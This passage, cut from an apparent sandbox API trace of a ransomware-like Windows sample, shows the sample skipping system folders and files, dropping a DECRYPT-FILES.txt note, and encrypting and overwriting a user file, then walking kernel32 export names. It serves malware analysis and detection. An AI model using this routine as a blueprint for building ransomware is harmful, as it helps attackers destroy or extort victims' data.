HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\jkbimi8.tmp" [0078.237] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.237] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.237] CloseHandle (hObject=0x0) returned 0 [0078.237] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.237] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 1 [0078.237] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2=".") returned 1 [0078.237] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="..") returned 1 [0078.238] lstrcatW (in: lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="\\" | out: lpString1="S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="S-1-5-21-3111613574-2524581245-2586426736-500\\" [0078.238] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Program Files") returned 0x0 [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch=":\\Windows") returned 0x0 [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Games\\") returned 0x0 [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\All Users") returned 0x0 [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="AhnLab") returned 0x0 [0078.238] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.238] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 110 [0078.238] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.238] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\jkbimi8.tmp") returned 122 [0078.238] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0078.241] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 110 [0078.241] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.241] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\DECRYPT-FILES.txt") returned 128 [0078.241] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0078.241] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0078.242] CloseHandle (hObject=0x454) returned 1 [0078.242] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 110 [0078.242] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*" [0078.242] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaad45a00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaad45a00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0078.242] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.242] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaad45a00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaad45a00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.242] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.242] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.242] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2b9bd87, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", cAlternateFileName="BE5B4F~1")) returned 1 [0078.243] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="DECRYPT-FILES.txt") returned -1 [0078.243] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="autorun.inf") returned 1 [0078.243] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="boot.ini") returned -1 [0078.243] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="desktop.ini") returned -1 [0078.243] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="ntuser.dat") returned -1 [0078.243] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="iconcache.db") returned -1 [0078.243] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="bootsect.bak") returned -1 [0078.243] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="ntuser.dat.log") returned -1 [0078.243] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="thumbs.db") returned -1 [0078.243] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Bootfont.bin") returned -1 [0078.243] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 110 [0078.243] lstrlenW (lpString="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 36 [0078.243] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0078.243] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" [0078.243] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.243] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.243] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=468) returned 1 [0078.243] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.244] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.244] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.244] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.244] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.244] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.245] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.245] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.245] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.246] CloseHandle (hObject=0x45c) returned 1 [0078.246] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.246] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.247] CloseHandle (hObject=0x0) returned 0 [0078.247] CloseHandle (hObject=0x458) returned 1 [0078.248] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.248] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.248] GetTickCount () returned 0x114c0ff [0078.248] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.248] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.248] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.249] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.249] lstrlenA (lpString="kernel32.dll") returned 12 [0078.249] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.249] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.249] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.249] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.249] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.249] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.249] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.249] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.249] lstrlenA (lpString="ADDATOMA") returned 8 [0078.249] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.249] lstrlenA (lpString="ADDATOMW") returned 8 [0078.249] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.249] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.249] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.249] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.249] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.250] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.250] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.250] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.250] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.250] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.250] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.250] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.250] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.250] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.250] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.250] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.250] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.250] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.250] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.250] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.250] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.250] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.250] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.250] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.250] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.251] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.251] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.251] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.251] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.251] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.251] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.251] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.251] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.251] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.251] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.251] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.251] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.251] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.251] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.251] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.251] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.251] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.251] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.251] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.252] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") 